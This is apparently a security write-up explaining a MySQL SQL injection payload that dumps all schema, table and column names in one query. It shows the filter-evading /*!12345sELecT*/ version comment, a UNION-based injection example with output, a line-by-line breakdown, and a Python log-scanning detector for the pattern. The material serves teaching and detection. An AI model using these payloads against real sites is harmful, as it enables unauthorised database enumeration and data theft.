What do (@) and (@:=0x00) represent in this payload?
- @ is the variable name
- @:=0x00 assigns zero to this variable.
Note: := is the assignment operator.
Thanks to @Frank Cedeno and @strnk for the Q&A in the comments.
@Frank Cedeno - How does /*!12345sELecT*/ become SELECT?
@strnk - It is a MySQL-specific extension to SQL comments: sELecT is only included in the query when the server version is greater than or equal to 12345 (1.23.45), so it filters out non-MySQL servers.
More info:
From websec sql_injection:
Retrieve multiple tables/columns at once:
```sql
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x
```
Example:
```sql
SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x), 4--+';
```
Output:
```
[ information_schema ] >CHARACTER_SETS > CHARACTER_SET_NAME
[ information_schema ] >CHARACTER_SETS > DEFAULT_COLLATE_NAME
[ information_schema ] >CHARACTER_SETS > DESCRIPTION
[ information_schema ] >CHARACTER_SETS > MAXLEN
[ information_schema ] >COLLATIONS > COLLATION_NAME
[ information_schema ] >COLLATIONS > CHARACTER_SET_NAME
[ information_schema ] >COLLATIONS > ID
[ information_schema ] >COLLATIONS > IS_DEFAULT
[ information_schema ] >COLLATIONS > IS_COMPILED
```
This Stackoverflow answer explains the SQL code:
First, I would make the query more readable by reformatting it:
```
1) SELECT (SELECT (@)
2)          FROM (SELECT (@:=0x00),
3)                       (SELECT (@)
4)                          FROM (information_schema.columns)
5)                         WHERE (table_schema >= @)
6)                           AND (@) IN (@:=CONCAT(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))
7)                       )
8)                )
9)        a);
```
The assignments of @ are as follows:
- On line 3, it gets the value 0x00 (decimal: 0)
- On line 5, this value is used in a greater-than comparison (table_schema >= 0)
- Line 6 concatenates every schema, table and column name onto @
- On line 1, @ is returned and contains the concatenated list of your structure
On line 6, an extra <br> (0x3C,0x62,0x72,0x3E) is added to the variable to make the output more readable.
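As an added, defender-side example (not from the original post, the linked cheat sheet or the Stack Overflow answer), the following Python flags the request pattern discussed above in constructed web-server log lines: it URL-decodes the query string, unwraps MySQL /*!NNNNN ... */ version comments so the hidden sELecT becomes visible, and then looks for the user-variable accumulator (@:= with CONCAT) together with information_schema enumeration. The log lines, indicator names and threshold are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus
# Constructed sample access-log lines (not taken from the page); the second one carries
# the payload from the answer above, URL-encoded the way a browser would send it.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /user.php?id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /user.php?id=-1%27%20UNION%20'
    '/*!12345sELecT*/%201,2,(SELECT%20(@)%20FROM%20(SELECT(@:=0x00),(SELECT%20(@)'
    '%20FROM%20(information_schema.columns)%20WHERE%20(table_schema%3E=@)%20AND%20'
    '(@)IN%20(@:=CONCAT(@,0x0a,table_name))))x),4--+%27 HTTP/1.1" 200 8192',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 640',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+)')
COND_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL executes the body: keep it
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)       # ordinary comment: drop it

INDICATORS = {  # names are assumptions chosen for this example, not a standard ruleset
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "user_var_assign": re.compile(r"@\w*\s*:="),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:columns|tables)\b"),
    "concat_accumulator": re.compile(r"\bin\s*\(\s*@\w*\s*:=\s*concat\s*\("),
}

def normalize(query: str) -> str:
    """URL-decode until stable (undoes double encoding), unwrap /*!NNNNN ... */ so the
    hidden sELecT becomes visible, drop ordinary comments, collapse space, lowercase."""
    while (decoded := unquote_plus(query)) != query:
        query = decoded
    query = PLAIN_COMMENT.sub(" ", COND_COMMENT.sub(r" \1 ", query))
    return re.sub(r"\s+", " ", query).lower()

def indicators_for(log_line: str) -> set:
    """Names of the indicators matched by the query string of one log line."""
    m = REQUEST.search(log_line)
    if not m or "?" not in m.group(1):
        return set()
    q = normalize(m.group(1).split("?", 1)[1])
    return {name for name, rx in INDICATORS.items() if rx.search(q)}

def scan(lines, threshold=2):
    """(index, sorted indicator names) for every line with at least `threshold` distinct
    indicators; a lone 'union' in a search term (third sample line) is not enough."""
    hits = []
    for i, line in enumerate(lines):
        found = indicators_for(line)
        if len(found) >= threshold:
            hits.append((i, sorted(found)))
    return hits
```

Unwrapping the version comment before matching is the important step: a filter that only looks for the literal word SELECT never sees it inside /*!12345sELecT*/, while MySQL does.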